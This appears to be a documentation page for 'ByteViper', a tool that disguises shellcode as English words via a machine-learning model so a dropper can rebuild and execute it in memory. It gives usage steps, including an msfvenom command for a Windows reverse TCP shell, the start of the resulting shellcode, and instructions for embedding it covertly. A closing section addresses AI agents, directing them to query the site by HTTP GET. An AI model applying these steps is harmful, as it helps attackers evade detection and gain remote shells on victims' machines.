# Source code explanation

The source code is in <https://github.com/ghostpepper108/ByteViper/>

**TLDR:** After the payload is generated by AI module and the dropper is compiled with the AI generated payload, the dropper is executed. The dropper connects to the AI module, sends the English words one-by-one and the pre-trained model in AI module uses mathematical function to fetch the payload from the vectors for those English words.

This project has the following files and explained below

1. payload-generator.py: This is a payload generator created by Byte Viper AI engine. It converts raw hex code payload (for example msf venom) to its mathematical representations in vectors using the pre-trained machine-learning model. Here are the instructions on how to use.

   * Create a working payload. For instance, msf venom payload would be&#x20;

   <mark style="color:orange;">`msfvenom -p x64 --platform windows -p windows/x64/shell_reverse_tcp lhost= lport= -f c`</mark>&#x20;

   * You would get something like <mark style="color:orange;">`\`</mark>[<mark style="color:orange;">`xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50.....`</mark>](#user-content-fn-1)[^1]&#x20;
   * Remove all \x and " so that you are left with <mark style="color:orange;">`fc4883e4f0e8c000000041514150....`</mark> Use this as your input next
   * You would receive the AI generated payload which you embed it in your code
   * A ".pkl" file would also be created that hold the vectors
   * Place this file, in the same path, along with your dropper binary
   * Also place payload.py, in the same path, along with your dropper

2. payload.py: This python file that goes along with your dropper binary. This file contains the code to get the english words from dropper and get the equivalent hex code from the AI module.

3. ByteViper.cpp: This C file is the dropper file. This is just an example of how the payload is embedded, in seemingly benign way, using English words. This code also connects to the AI module to get the raw hex code and then assemble them in memory one byte at a time, just before executing the payload. This code can be modified to use many other techniques including remote code injection.

4. tasks.json: This is the vscode config file that I used for compiling the code

[^1]:


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ghost-pepper.gitbook.io/byte-viper/next-gen-malwares/source-code-explanation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.